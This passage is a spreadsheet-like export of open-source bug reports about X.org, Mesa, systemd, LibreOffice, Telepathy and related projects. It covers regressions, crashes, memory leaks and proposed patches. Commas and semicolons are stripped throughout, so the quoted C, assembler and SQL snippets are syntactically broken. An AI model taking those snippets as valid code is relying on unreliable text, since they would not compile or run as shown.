Somewhere between the 1.2.5 and today's git something changed the way monitor's resolutions are detected. I didn't do much git updates since and I don't have the time right now to figure out which commit did the trick (though I did go as far as 5 commits back from the current one) but at least for the time being I'm attaching both xorg logs (the one with the 1600x1200 resolution is the right one whilst the maximum I got was 1360x768 - see the log).
Hopefully someone could figure out without going through commits what could be a potential cause for this and point me to a probable commit.
When I have time I'll do the searching myself but that won't happen at least until the weekend.</t>
  </si>
  <si>
    <t>XORG-11139</t>
  </si>
  <si>
    <t>minor code cleanup</t>
  </si>
  <si>
    <t>This block in src/savage_dri.c looks suspiciously like cruft. I can not make any sense of that block and its local unused variable:
1118    {
1119       unsigned int shift = 0
1120       
1121       if(pSAVAGEDRI-&gt;width &gt; 1024)
1122         shift = 1 
1123 
1124       pSAVAGEDRI-&gt;aperturePitch = psav-&gt;ulAperturePitch
1125    }
The last time anyone touched this block was commit 54a78b4d252ba06dd520c5d43ad55b31323408ec but this has been like this since as long as git can tell.</t>
  </si>
  <si>
    <t>XORG-50281</t>
  </si>
  <si>
    <t>Xorg-server memory leaks found with cppcheck</t>
  </si>
  <si>
    <t>found in xorg-server-1.12.1.902
detected with cppcheck
[Xi/xiproperty.c:734]: (error) Memory leak: new_value.data
[config/wscons.c:175]: (error) Memory leak: dev.config_info
[config/wscons.c:209]: (error) Memory leak: dev.config_info
[glx/glxdri.c:639]: (error) Memory leak: context
[glx/glxdri2.c:700]: (error) Memory leak: screen
[hw/dmx/config/dmxcompat.c:231]: (error) Resource leak: str
[hw/dmx/dmxfont.c:408]: (error) Memory leak: goodfps
[hw/dmx/glxProxy/glxcmds.c:1981]: (error) Memory leak: pGlxPixmap.be_xids
[hw/dmx/input/dmxmotion.c:149]: (error) Memory leak: dmxLocal.history
[hw/kdrive/src/kxv.c:547]: (error) Memory leak: pat.name
[hw/kdrive/src/kxv.c:547]: (error) Memory leak: pe.name
[hw/xfree86/common/xf86sbusBus.c:647]: (error) Memory leak: data
[hw/xfree86/os-support/bus/Sbus.c:621]: (error) Memory leak: name
[hw/xfree86/utils/gtf/gtf.c:695]: (error) Memory leak: m
[hw/xquartz/xpr/x-list.c:103]: (error) Memory leak: b
[hw/xwin/glx/indirect.c:2396]: (error) Memory leak: result</t>
  </si>
  <si>
    <t>karbofos</t>
  </si>
  <si>
    <t>LIBREOFFICE-83010</t>
  </si>
  <si>
    <t>UI: Spinboxes (WrapFields) reset back to 0 after crossing max value</t>
  </si>
  <si>
    <t>This happens with ca. 1 week old development build but it's been happening since .ui migration of this tab page I'd say.
1. Format cells -&gt; Alignment -&gt; Text orientation 
2. Spin 'Degrees' spinbox down to 0 (by clicking on down arrow)
3. Spin down once again to 359 degrees
4. Try to spin down once again. The value gets reset to 0 (instead of going fluently the full circle to 358 357 ...)</t>
  </si>
  <si>
    <t>XORG-7639</t>
  </si>
  <si>
    <t>Exa function ExaOffscreenSwapout swaps out pinned offscreen areas.</t>
  </si>
  <si>
    <t>The above function swaps out pinned offscreen areas be it DRI areas allocated
just after EXA initialization scratch areas or video areas.
It may be intentional and might be useful for EXA pixmaps but IMHO a memory
manager that is used for other stuff should not do that.
Attached is a patch that fixes the problem.</t>
  </si>
  <si>
    <t>DRI-21602</t>
  </si>
  <si>
    <t>Problem with new jglisse kms radeon driver and 2d driver</t>
  </si>
  <si>
    <t>Created attachment 25566
Xorg.0.log from failed X start
I have done everything as described here:
http://jglisse.livejournal.com/1822.html
After overconing vesafb and vga16 problem I was able to see console but starting X failed and I only get error(full log attached):
failed to add fb
After reading some code I found that 2d driver uses drmModeAddFB
with in fact calls ioctl DRM_IOCTL_MODE_ADDFB. Unfortunately it returns -1. So I checked drm module to find out why the -1 is returned. The drm_mode_addfb should support this ioctl but I don't think it was even called once. I have even added DRM_ERROR line to show if it was used but I never saw anything printed from it.</t>
  </si>
  <si>
    <t>OPENCLIPART.ORG-3994</t>
  </si>
  <si>
    <t>Nazi flag need to tag and filter it appropriately</t>
  </si>
  <si>
    <t>The issue of the Nazi flag came up on the mailing list
http://lists.freedesktop.org/pipermail/clipart/2005-August/003807.html
We do not wish to remove it.  At least that seems to be the general consensous.  
I propose removing the Germany keyword for now until we have better ways to
weight the value of the different keywords and directly associating Nazism only
with Germany is an unfortunate over simplification (although it does make sense
as Germany was the country most closely associated with the flag).  
I suggested this on the mailing list and I am filing this bug to make sure the
issue is not forgotten.  
http://lists.freedesktop.org/pipermail/clipart/2005-August/003838.html
Should I download edit and resubmit the Nazi flag without the germany keyword?
The issue of making it easy for French and German distributors of our collection
to exclude this file should they choose to do so probably also needs to be
addressed further.</t>
  </si>
  <si>
    <t>SYSTEMD-80537</t>
  </si>
  <si>
    <t>sysv-generator incorrectly handles sysv services that require network-online: it makes network-online.target Want those services causing them to be started unexpectedly</t>
  </si>
  <si>
    <t>This was discussed downstream in Fedora Rawhide: https://bugzilla.redhat.com/show_bug.cgi?id=1112908 (and previously on a mailing list thread). Myself and Bruno Wolff noted that remaining sysv services on our systems seemed to be being started even though we had not explicitly enabled them and they did not appear as SXX(service) symlinks in /etc/rc*.d/ (which is what indicates them as 'enabled' so far as SysV is concerned).
I noticed that the affected services seem to appear in /run/systemd/generator.late/network-online.target.wants  and traced things out from there.
I found that if a file in /etc/init.d contains an LSB stanza like:
# Required-Start: $network
then on boot there will be a symlink to the sysv-generator converted service in /run/systemd/generator.late/network-online.target.wants . (This also applies to Should-Start and I think to NetworkManager-wait-online - I think this will be triggered by anything considered to match SPECIAL_NETWORK_ONLINE_TARGET in sysv-generator around line 515).
Poking through sysv-generator.c  I believe I figured out what's going on here. What it's actually trying to do is the converse: to implement the service wants the network to be up dependency expressed by Required-Start: $network or similar create a symlink to network-online.target in foo.service.wants/ . But the argument ordering is wrong for at least *this* case.
generate_unit_file() does this for s-&gt;wants relationships:
        STRV_FOREACH(p s-&gt;wants) {
                r = add_symlink(*p s-&gt;name)
                if (r &lt; 0)
                        log_error_unit(s-&gt;name Failed to create 'Wants' symlink to %s: %s *p strerror(-r))
        }
At least in the affected case it's basically calling add_symlink(wanting servicewanted service) . but the logic of add_symlink() is add_symlink(fromto) so it winds up creating a symlink from wanting.service to wanted.service.wants/wanting.service - making wanted.service depend on wanting.service exactly the opposite of what we want.
So I wrote a patch to fix that by simply inverting the order of the add_symlink() parameters:
                r = add_symlink(s-&gt;name *p)
but I found a couple of problems. This gets the logic right for the affected case but still doesn't actually work because it winds up creating a symlink like this:
/run/systemd/generator.late/plague-server.service.wants/network-online.target -&gt; /run/systemd/generator.late/network-online.target
it should point to /lib/systemd/system/network-online.target  but it's not smart enough to realize that. I also realized that sysv-generator uses the generate_unit_file() wants stuff in two other cases and for at least one of those the ordering is correct. e.g. I create a symlink:
/etc/rc3.d/S50foo -&gt; /etc/init.d/foo
So setting the service foo to be 'enabled' for runlevel 3 in sysv language. Now when I boot sysv-generator creates:
/run/systemd/generator.late/runlevel3.target.wants/foo.service -&gt; /run/systemd/generator.late/foo.service
that's using the same bit of generate_unit_file() but for *this* usage the ordering is correct and does what we actually want: foo will run in 'runlevel3'. So we can't simply invert the ordering of the add_symlink() call without causing other problems.
So I think we need to go to load_sysv() and look at the special handling of the network online target:
                                        if (streq(m SPECIAL_NETWORK_ONLINE_TARGET) &amp;&amp; !is_before) {
                                                /* the network-online target is special as it needs to be actively pulled in */
                                                r = strv_extend(
                                                if (r &lt; 0)
                                                        return log_oom()
                                                r = strv_extend(
                                                if (r &lt; 0)
                                                        return log_oom()
                                        }
and do...something different there. But I'm afraid my C isn't quite up to handling that 'something different' I don't think. I hope I've correctly analyzed the problem at least though.
Obviously this bug is fairly serious - it means all sysv services present on the system will be started any time network-online.target is Wanted by anything *else* (which is usually the case on a typical system). This could even cause a security problem - imagine you have /etc/init.d/telnet ...</t>
  </si>
  <si>
    <t>DRI-105683</t>
  </si>
  <si>
    <t>[CI] igt@kms_frontbuffer_tracking@* - fail - FBC disabled: CFB requirements changed</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/drmtip_5/fi-cfl-s2/igt@kms_frontbuffer_tracking@fbc-stridechange.html
(kms_frontbuffer_tracking:1713) WARNING: fbc_is_enabled()?
FBC disabled: CFB requirements changed
(kms_frontbuffer_tracking:1713) CRITICAL: Test assertion failure function do_status_assertions file ../tests/kms_frontbuffer_tracking.c:1748:
(kms_frontbuffer_tracking:1713) CRITICAL: Failed assertion: fbc_is_enabled(IGT_LOG_WARN)
(kms_frontbuffer_tracking:1713) CRITICAL: FBC disabled
Subtest fbc-stridechange failed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-49991</t>
  </si>
  <si>
    <t>WIKI: Donation request intrusive misplaced wrapped</t>
  </si>
  <si>
    <t>With my Seamonkey 2.9.1 the donation request is wrapped (currency not in the same line as amount).
Additionally it's too nearby to the contents (see screenshot: distance between Bank button and text Drupal administration basics).
And BTW IMHO that very visible request might be ok on the main page but it's too intrusive if I see it on every page.</t>
  </si>
  <si>
    <t>LIBREOFFICE-64984</t>
  </si>
  <si>
    <t>EDITING: Creating table with GUI - table could not be saved</t>
  </si>
  <si>
    <t>Version is not right. I have tested with 4.1.0.0.beta1.
Create a new database.
Create a table.
Try to save the table.
The table couldn't be saved by the button or by File â†’ Save.
Create a table in the SQL-Mode:
CREATE TABLE Test (ID INT PRIMARY KEY Text VARCHAR(50))
The table could be crated will be shown after View â†’ Refresh Tables.
You could edit this table also could add another field - it works.
My sytem is OpenSUSE 12.3 32bit rpm.
This bug has been confirmed in the mailinglist discuss@de.libreoffice.org with Debian 64bit. So I set the bug to New.</t>
  </si>
  <si>
    <t>LIBREOFFICE-76195</t>
  </si>
  <si>
    <t>regression: with Table Boundaries disabled the borders of tables are not visible</t>
  </si>
  <si>
    <t>In a writer document create a table. Select a cell add borders.
If table boundaries are disabled then borders of the celle are'nt visible.
Regression vs 4.2.2</t>
  </si>
  <si>
    <t>LIBREOFFICE-31714</t>
  </si>
  <si>
    <t>Improve documentation to show how to show hidden columns and rows.</t>
  </si>
  <si>
    <t>Show Column only works if you select the range of columns. It doesn't do anything if you Ctrl-Click the two columns left and right of a hidden column.
Please change the code to reveal all columns that are between any selected columns no matter if I selected them with Shift or Ctrl.</t>
  </si>
  <si>
    <t>LIBREOFFICE-56100</t>
  </si>
  <si>
    <t>ASKLIBREOFFICE delete spam not only close</t>
  </si>
  <si>
    <t>Can the Administrator delete SPAM question not only close them. These are only dead bodies laying around and occuping space.</t>
  </si>
  <si>
    <t>TELEPATHY-51441</t>
  </si>
  <si>
    <t>[next] replace TpBase*Class::interfaces by TpBase*Class::get_interfaces</t>
  </si>
  <si>
    <t>Currently TpBase*Class have inconsistent way of letting implementation tell which dbus interfaces are implemented. Historically they had a const gchar * const *interfaces field but it has the problem that subsubclass can't define additional interfaces.
For example we have TpBaseChannel-&gt;TpBaseCallChannel-&gt;TpBaseMediaCallChannel-&gt;GabbleCallChannel and at each level we may have additional interfaces. To Fix that issue we deprecated the interfaces field from TpBaseChannel and added GPtrArray *get_interfaces (TpBaseChannel *self) so subclasses can override that method first chainup to get the GPtrArray of interfaces implemented by parents then simply g_ptr_array_add() extra ifaces and return that.
TpBaseChannel TpBaseCallContent and TpBaseCallStream use that system but not TpBaseConnection TpBaseConnectionManager TpBaseRoomConfig and TpBaseProtocol. This is current inconsistent so I suggest using the get_interfaces everywhere.</t>
  </si>
  <si>
    <t>LIBREOFFICE-65450</t>
  </si>
  <si>
    <t>Writer crash on File-&gt;Open</t>
  </si>
  <si>
    <t>Created attachment 80388
Stacktrace
Writer crashes here when reproducing those steps:
  1) start LO and create a new Writer document
  2) File -&gt; New and create a new Presentation
  3) Move the Presentation Windows and click File -&gt; Open on Writer _without_ focusing the windows first</t>
  </si>
  <si>
    <t>saturday6c</t>
  </si>
  <si>
    <t>pierre-eric</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-104564</t>
  </si>
  <si>
    <t>Expose the automatic login user as a daemon property.</t>
  </si>
  <si>
    <t>Created attachment 136639
Expose the automatic login user as a daemon property.
This stops us having to iterate across each user to find which one is configured
for automatic login. Due to D-Bus not having support for nullable types a client
must treat the '/' value as automatic login not supported.
[1] https://bugs.freedesktop.org/show_bug.cgi?id=27857</t>
  </si>
  <si>
    <t>DRI-99909</t>
  </si>
  <si>
    <t>[KBL] [IGT] drv_missed_irq assertion failure check_rings != expect_rings</t>
  </si>
  <si>
    <t>HW config
===============================
Processor Number				i7-7500U
Processor Graphics 				IntelÂ® HD Graphics 620
Graphics Base Frequency				300.00 MHz
Graphics Max Dynamic Frequency			1.05 GHz
Graphics Video Max Memory			32 GB
Graphics Output					eDP/DP/HDMI/DVI
SW config
=================================
Kernel version : 4.10.0-rc8-e80b772
commit e80b772bf85da72c46b582e7c4f7b0d861cb4669
    drm-tip: 2017y-02m-14d-22h-44m-17s UTC integration manifest
Component         : drm
	tag       : libdrm-2.4.75-6-gec80fd3
	commit    : ec80fd3
 Component         : cairo
	tag       : 1.15.4-6-g5854dd9
	commit    : 5854dd9
Component         : intel-gpu-tools
	tag       : intel-gpu-tools-1.17-240-gca2ba47
	commit    : ca2ba47
Steps
====================================
./kms_busy --run-subtest extended-modeset-hang-newfb-blt-a
Program output
=====================================
(drv_missed_irq:1523) CRITICAL: Test assertion failure function __real_main115 file drv_missed_irq.c:178:
(drv_missed_irq:1523) CRITICAL: Failed assertion: check_rings == expect_rings
(drv_missed_irq:1523) CRITICAL: error: 0 != 0x17
Stack trace:
  #0 [__igt_fail_assert+0x101]
  #1 [main+0x38e]
  #2 [__libc_csu_init+0x0]
Test drv_missed_irq failed.
**** DEBUG ****
(drv_missed_irq:1523) igt-core-DEBUG: Test requirement passed: !igt_run_in_simulation()
(drv_missed_irq:1523) drmtest-DEBUG: Test requirement passed: !(fd&lt;0)
(drv_missed_irq:1523) DEBUG: Test requirement passed: gem_mmap__has_wc(fd)
(drv_missed_irq:1523) DEBUG: Clearing rings 17
(drv_missed_irq:1523) DEBUG: Clearing ring render [1]
(drv_missed_irq:1523) DEBUG: Clearing ring bsd [2]
(drv_missed_irq:1523) DEBUG: Clearing ring bsd1 [2002]
(drv_missed_irq:1523) DEBUG: Clearing ring bsd2 [4002]
(drv_missed_irq:1523) DEBUG: Clearing ring blt [3]
(drv_missed_irq:1523) DEBUG: Clearing ring vebox [4]
(drv_missed_irq:1523) DEBUG: Testing rings 17
(drv_missed_irq:1523) DEBUG: Executing on ring render [1]
(drv_missed_irq:1523) DEBUG: Executing on ring bsd [2]
(drv_missed_irq:1523) DEBUG: Executing on ring bsd1 [2002]
(drv_missed_irq:1523) DEBUG: Executing on ring bsd2 [4002]
(drv_missed_irq:1523) DEBUG: Executing on ring blt [3]
(drv_missed_irq:1523) DEBUG: Executing on ring vebox [4]
(drv_missed_irq:1523) CRITICAL: Test assertion failure function __real_main115 file drv_missed_irq.c:178:
(drv_missed_irq:1523) CRITICAL: Failed assertion: check_rings == expect_rings
(drv_missed_irq:1523) CRITICAL: error: 0 != 0x17
****  END  ****
FAIL (12.334s)
dmesg
=============================================
[   74.580070] Console: switching to colour dummy device 80x25
[   74.580172] [IGT] drv_missed_irq: executing
[   74.580806] [drm:intel_ring_workarounds_emit [i915]] Number of Workarounds emitted: 17
[   74.617781] [drm:i915_ring_test_irq_set [i915]] Masking interrupts on rings 0x00000017
[   74.617881] [drm:i915_ring_test_irq_set [i915]] Masking interrupts on rings 0x00000000
[   86.914017] [IGT] drv_missed_irq: exiting ret=99
[   86.914756] [drm:intel_ring_workarounds_emit [i915]] Number of Workarounds emitted: 17
[   86.977398] Console: switching to colour frame buffer device 240x67</t>
  </si>
  <si>
    <t>SHARED-DESKTOP-ONTOLOGIES-31381</t>
  </si>
  <si>
    <t>nco</t>
  </si>
  <si>
    <t>SHARED-DESKTOP-ONTOLOGIES</t>
  </si>
  <si>
    <t>Changes to NCO to better support Instant Messaging/VoIP</t>
  </si>
  <si>
    <t>The following two branches improve NCO's support for Instant Messaging/VoIP by making the ontology more accurately reflect the way these technologies work more accurately.
Branch one replaces AudioIMAccount and VideoIMAccount with a set of capabilities which an account can have including Audio and Video. The reason for this is that a contact's support for auido/video may depend on the device/program they are currently logged on from rather than being a fixed property of the contact.
http://cgit.freedesktop.org/~gberg/ontologies/log/?h=capabilities-audio-video-im-2
Branch improves support for intercontact relationships allowing you to indicate the connections and subscriptions between a PersonContact representing your own account and a PersonContact representing someone else's account.
http://cgit.freedesktop.org/~gberg/ontologies/log/?h=intercontact-relationships</t>
  </si>
  <si>
    <t>shared-desktop-ontologies-bugs</t>
  </si>
  <si>
    <t>grundleborg</t>
  </si>
  <si>
    <t>MESA-83636</t>
  </si>
  <si>
    <t>[LLVM 3.5] Mesa32 build failure with LLVM 3.5.</t>
  </si>
  <si>
    <t>gallivm/lp_bld_debug.cpp:246:79: note: candidate is:
In file included from gallivm/lp_bld_debug.cpp:41:0:
/usr/include/llvm/Support/TargetRegistry.h:384:21: note: llvm::MCDisassembler* llvm::Target::createMCDisassembler(const llvm::MCSubtargetInfo&amp;) const
     MCDisassembler *createMCDisassembler(const MCSubtargetInfo &amp;STI) const {
                     ^
/usr/include/llvm/Support/TargetRegistry.h:384:21: note:   candidate expects 1 argument 2 provided
Makefile:1706: recipe for target 'gallivm/lp_bld_debug.lo' failed
Seems they changed the arguments on this function or something along those lines.</t>
  </si>
  <si>
    <t>aaronbottegal</t>
  </si>
  <si>
    <t>SYSTEMD-58289</t>
  </si>
  <si>
    <t>[PATCH] Check arguments to udev_enumerate_new</t>
  </si>
  <si>
    <t>udev_enumerate_new() does not check its input argument of a 'struct udev' for NULLness.
This means that arguably sloppy code like in Xorg:
    udev = udev_monitor_get_udev(udev_monitor)
    enumerate = udev_enumerate_new(udev)
    if (!enumerate)
        return
Will have a valid (but unusable) enumerate object even if the 'udev' pointer itself is NULL.
While the Xorg code should probably also check the 'udev' pointer I think it makes sense for libudev to not create/return a bogus enumerate object.  Plus the other functions in libudev are pretty good about validating their input so it would be consistent.
Patch coming.</t>
  </si>
  <si>
    <t>DBUS-14260</t>
  </si>
  <si>
    <t>apple ld doesn't support -z</t>
  </si>
  <si>
    <t>Created attachment 13960
Fix GNU ld assumption
since dbus 1.0 some LDFLAGS have changed in dbus and as such ./configure no longer passes on Mac OS X.
This patch wraps the -z option in a check for with_gnu_ld.</t>
  </si>
  <si>
    <t>TELEPATHY-27535</t>
  </si>
  <si>
    <t>GetContactAttributes() no longer specified to be needlessly fascist about interfaces</t>
  </si>
  <si>
    <t>telepathy-sunshine probably needs the same change as telepathy-butterfly since GetContactAttributes apparently isn't provided by telepathy-python. See the bugs referenced below.
Will wrote the following patch for Butterfly:
http://git.collabora.co.uk/?p=telepathy-butterfly.gita=commitdiffh=07bd347f89195f357f69622b8d02239f663a1a3d
+++ This bug was initially created as a clone of Bug #27374 +++
+++ This bug was initially created as a clone of Bug #27325 +++
From the definition of GetContactAttributes():
&gt; It is an error to request interfaces that are not supported by this
&gt; Connection (i.e. mentioned in the ContactAttributeInterfaces
&gt; property).
&gt;
&gt; | This makes it possible to distinguish between interfaces for which
&gt; | the Connection has nothing to say (e.g. we don't know the avatar
&gt; | tokens of any of the contacts so we omitted them all) and interfaces
&gt; | for which this API isn't supported.
This is needlessly pedantic. If we had instead said that the CM must
ignore interfaces which aren't supported on the Contacts interface then
client code that does care could still check ContactAttributeInterfaces
to distinguish those two cases and client code that doesn't care
wouldn't have to mess around checking the list of interfaces it passes
to GetContactAttributes().</t>
  </si>
  <si>
    <t>XORG-11797</t>
  </si>
  <si>
    <t>xserver can't return correctly to text mode</t>
  </si>
  <si>
    <t>I have some problem about exit xserver and return to text mode.
When I start xserver by 'startx'.
And when I exit xserver by normal way such as exit or   Backspace
It freeze on last screen of xserver and can't return to text mode.
I can do every thing  that i can do on text mode console  
after my screen are freeze only problem is I can't see my text mode console.
I can type and execute command but I can't see my text mode consle. 
I can start xserver again by type 'startx' and it go back to xserver screen 
and I can work every thing normally on xserver screen.
The only way to go back to text mode correctly is halt xserver by some program 
such as 'mplayer -vo xv' (mplayer with wrong video out crash my xserver).
When that program crash my xserver there are some thing in my Xorg.0.log file :
Fatal server error:
Caught signal 11.  Server aborting
(II) AIGLX: Suspending AIGLX clients for VT switch
(II) RADEON(0): RADEONRestoreMemMapRegisters() : 
(II) RADEON(0):   MC_FB_LOCATION   : 0x1fff0000
(II) RADEON(0):   MC_AGP_LOCATION  : 0x27ff2000
But when I exit xserver in normal way I can't see this infomation in 
Xorg.0.log file.
How can I do ?
Thank you and sorry for my bad english.</t>
  </si>
  <si>
    <t>mrpachara</t>
  </si>
  <si>
    <t>LIBREOFFICE-39657</t>
  </si>
  <si>
    <t>crash when opening signed document</t>
  </si>
  <si>
    <t>Created attachment 49703
Document signed with Belgian eID applet
This is a document created with OOo and signed afterwards with a dev version of the Belgian eID applet which tries to follow the signature part of ODF 1.2 COS very closely (it does includes XAdES elements but that should not be a problem)
Opening the document causes LO 3.4.2rc2 and rc3 to crash on Win7 Enterprise (64 bit). Opening the unsigned document works just fine.
Problem signature:
  Problem Event Name:	BEX
  Application Name:	soffice.bin
  Application Version:	3.4.201.500
  Application Timestamp:	4e2d908c
  Fault Module Name:	MSVCR90.dll
  Fault Module Version:	9.0.30729.6161
  Fault Module Timestamp:	4dace5b9
  Exception Offset:	0006ccd5
  Exception Code:	c0000417
  Exception Data:	00000000
  OS Version:	6.1.7601.2.1.0.256.4
  Locale ID:	2067
  Additional Information 1:	6f99
  Additional Information 2:	6f99e81090cc8b737f9b268c474121bf
  Additional Information 3:	47c0
  Additional Information 4:	47c006fc08cc81041e1cb30922a670cb
OOo 3.3 can open the document although it fails to see the signature
See also http://openoffice.org/bugzilla/show_bug.cgi?id=107864.</t>
  </si>
  <si>
    <t>bart.hanssens</t>
  </si>
  <si>
    <t>MESA-33388</t>
  </si>
  <si>
    <t>Dubious assembler in xform4.S</t>
  </si>
  <si>
    <t>Created attachment 42347
Change movzx to movzbl in xform4.S
When building Mesa with the trunk version of clang using its integrated
assembler it complains about the ambiguous 'movzx' mnemonics in
src/mesa/x86-64/xform4.S:
clang -c -I../../include -I../../src/mesa -I../../src/mesa/main -I/usr/local/include -O2 -pipe -fno-strict-aliasing -Wall -Wmissing-prototypes -std=c99 -ffast-math -fno-strict-aliasing  -fPIC  -DUSE_X86_64_ASM -DHAVE_POSIX_MEMALIGN -DUSE_XCB -DPTHREADS -DUSE_EXTERNAL_DXTN_LIB=1 -DIN_DRI_DRIVER -DHAVE_ALIAS -DGLX_INDIRECT_RENDERING -DGLX_DIRECT_RENDERING x86-64/xform4.S -o x86-64/xform4.o
/tmp/cc-A7bOtT.s:36:2: error: invalid operand for instruction
 movzx 20(%rdx) %eax
 ^
The mnemonics are ambiguous because there are no suffixes to specify
whether the source is byte or word-sized.  They are accepted by GNU as
and it apparently just assumes we want to zero-extend a byte:
  23:   0f b6 42 14             movzbl 0x14(%rdx)%eax
E.g. move 'b' (byte) to 'l' (dword).  The source in question says:
        movzx V4F_STRIDE(%rdx) %eax    /* stride */
where V4F_STRIDE is the offset to the stride member of the GLvector4f
struct which is a GLuint.
If the original intention was to ignore the upper bytes of the stride
field and just use the first byte then I propose to change the 'movzx'
mnemonics to 'movzbl' which explicitly specify the source and
destination type.  See the attached patch.</t>
  </si>
  <si>
    <t>TELEPATHY-29078</t>
  </si>
  <si>
    <t>use TpBaseProtocol</t>
  </si>
  <si>
    <t>See branch:
http://git.collabora.co.uk/?p=user/smcv/haze-smcv.gita=shortlogh=refs/heads/protocol
This requires a recent version of the corresponding telepathy-glib branch from Bug #27997.</t>
  </si>
  <si>
    <t>LIBREOFFICE-86307</t>
  </si>
  <si>
    <t>is SOLARIS workaround #i64273#  in vcl/unx/generic/app/wmadaptor.cxx still necessary?</t>
  </si>
  <si>
    <t>I've been running some time now with this patch effectivly bypassing the workaround cited in the subject line:
--- vcl/unx/generic/app/wmadaptor.cxx.orig	2014-01-27 21:35:34.000000000 +0
000
+++ vcl/unx/generic/app/wmadaptor.cxx
@@ -9997 +9997 @@ void WMAdaptor::setWMName( X11SalFrame*
     }
     static bool bTrustXmb = true
-    #ifdef SOLARIS
+    #ifdef xSOLARIS
     /* #i64273# there are some weird cases when using IIIMP on Solaris
     *  where for unknown reasons XmbTextListToTextProperty results in
     *  garbage. Test one string once to ensure safety.
perhaps justification should be found to keep this around.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-93759</t>
  </si>
  <si>
    <t>Created attachment 121112
GPG Public Key
Hi
I'd like to request an account for NetworkManager project.
Real name: Francesco Giudici
Email: fgiudici@redhat.com
Preferred account name: fgiudici
Thank you
Francesco</t>
  </si>
  <si>
    <t>fgiudici</t>
  </si>
  <si>
    <t>XPRINT-182</t>
  </si>
  <si>
    <t>X init script needs to go in /etc/X11/xinit/xinitrc.d on linux</t>
  </si>
  <si>
    <t>Linux (Red Hat Enterprise Linux 3 at least) does not look in
/etc/X11/Xsession.d where xprint installation puts the X init script for xprint
(as of version 009 gamma).  It looks in /etc/X11/xinit/xinitrc.d and putting it
there works fine.
I seem to remember a bug like this in mozdev's bugzilla but it's down now.</t>
  </si>
  <si>
    <t>ajschult</t>
  </si>
  <si>
    <t>XORG-43425</t>
  </si>
  <si>
    <t>xauth is unable to handle FamilyWild resulting in X11 forwarding problems with SSH</t>
  </si>
  <si>
    <t>There is a long and detailed discussion of this problem in Red Hat Bugzilla under https://bugzilla.redhat.com/show_bug.cgi?id=505545
Short problem description:
==========================
If using GDM with XDMCP then ssh is not able to start X11 clients on the remote side. You get a No xauth data using fake authentication data for X11 forwarding. from SSH.
Detailed problem description:
=============================
The problem is that xauth is unable to deal with the Family FamilyWild which is used by GDM in XDMCP to store the MIT-MAGIC-COOKIE-1 for the user.
This results in SSH not being able to get the MIT-MAGIC-COOKIE-1 of the user because xauth list $DISPLAY does not match the DISPLAY (because it does not understand FamilyWild).
This results in SSH not being able to ForwardX11 and therefore no X11 client could be started on the remote side.
Solution:
=========
I developed a patch to improve xauth to handle FamilyWild. I will submit this patch using GIT in a moment.</t>
  </si>
  <si>
    <t>tilmann</t>
  </si>
  <si>
    <t>LIBREOFFICE-53341</t>
  </si>
  <si>
    <t>Broken DEB packages</t>
  </si>
  <si>
    <t>Several package relationship fields in the DEB packages provided look like this:
Provides: libobasis36-en_GB
Spot the two(!) errors with that.
.
.
.
Neither uppercase letters nor underscores are allowed.
Fix:
Provides: libobasis36-en-gb
$(tr A-Z_ a-z-)
And that with all such fields (Package Depends Provides etc).
Debian Policy Â§5.6.1 (4)</t>
  </si>
  <si>
    <t>t.glaser</t>
  </si>
  <si>
    <t>XORG-12298</t>
  </si>
  <si>
    <t>Integer overflows in  build_range() [CVE-2007-4989]</t>
  </si>
  <si>
    <t>iDefense has sent us the attached draft advisory. 
A 1st look at the code confirms the problem.
Patch is pretty straightforward. I'll write it and attach it there shortly.
Probably not a blocker for the relase (but if other things are postponing it to after next week it can probably make it).</t>
  </si>
  <si>
    <t>XORG-1777</t>
  </si>
  <si>
    <t>nv driver updates from Mark Vojkovich</t>
  </si>
  <si>
    <t>Mark Vojkovich has committed the following fixes to the nv driver in XFree86 CVS
since the trees were last sync'ed.   Andy Ritger has confirmed these changes are
all covered by the Nvidia license and not the XFree86 1.1 license and encouraged
their integration into the Xorg tree.
   Support for new NVIDIA chips.
   Egbert has a laptop that needs some DPMS ordering reversed.
   New chip support and workaround for Toshiba M30 laptop issue.
   PCI-Xpress chip support.
   DPMS support for DVI.
   Cursor changes for NV11 so that alpha blended cursors will work
      in conjunction with dithering (laptop panels).  It previously
      did not.
   HW support for alpha blended stretch blits on NV5 and higher
      though nothing is using them at this point.
   Add support for VBlank syncing the Xv Blit adaptor on hardware
      that supports it (NV11 and higher).
   Make console restoration a little more robust.  We were making
      an assumption that failed on a newer laptop.
   Workaround for some NV31 DVI artifacts.</t>
  </si>
  <si>
    <t>UDISKS-50142</t>
  </si>
  <si>
    <t>udisks shouldn't require CONFIG_SWAP=y in kernel</t>
  </si>
  <si>
    <t>Hello! Some weeks ago Gnome 3.4 moved to the stable repositories of Archlinux. After the upgrade I noticed the automatic mounting of Memory-Cards USB-Thumbdrives and work any longer. Even Palimpsest itself doesn't work. Udisks seem to segfault with this message udisksd[834] trap int3 ip:7fbbaa4115a1 sp:7fff78a33470 error:0.
Finally I got it with a lot of trail and error: udisks2 seems to require CONFIG_SWAP=y
I never enable this option in my kernel for a simple an obvious reason there is no SWAP-Space on may disk.
1. udisks should offer a simple documentation for users with the requirements of userland and kernel on its website (lot of wasted time...)
2. udisks should't depend hard on SWAP
Additional information:
https://bbs.archlinux.org/viewtopic.php?id=140559
Can somebody explain why udisks rely on SWAP? I see no sense.
Thanks for your work!</t>
  </si>
  <si>
    <t>UIM-522</t>
  </si>
  <si>
    <t>Recover mode-list syncronization on uim-skk</t>
  </si>
  <si>
    <t>The patch by [Anthy-dev 681] had removed mode-list updating codes but these
should be still retained for now. Although mode-list is obsolete on most
platforms IMKit-uim 0.4.2 on Zaurus Linux-based PDA is still using mode-list.
mode-list should be retained until Tokunaga-san said that prop-list and
helper-server has been rock solid stable and mode-list is deprecated.</t>
  </si>
  <si>
    <t>LIBREOFFICE-79275</t>
  </si>
  <si>
    <t>File Properties dialogâ€™s layout is subpar</t>
  </si>
  <si>
    <t>Created attachment 99895
Annotated screenshot
The General tab of the File &gt; Properties dialog is ugly because its layout is highly unstable. Iâ€™ve highlighted many errors on the attached screenshot.
Its layout depend on the different labelsâ€™ length so that lenghty translations add up to an useless white space near the documentâ€™s icon â€” that space should be available to the short file name field instead which is again dependable on the length of the document authorâ€™s name a label thatâ€™s placed much below and thus is unrelated.
Note that in the attached screenshot the Properties dialog is much wider than if the shown fields were empty leading to all of that messy white space.
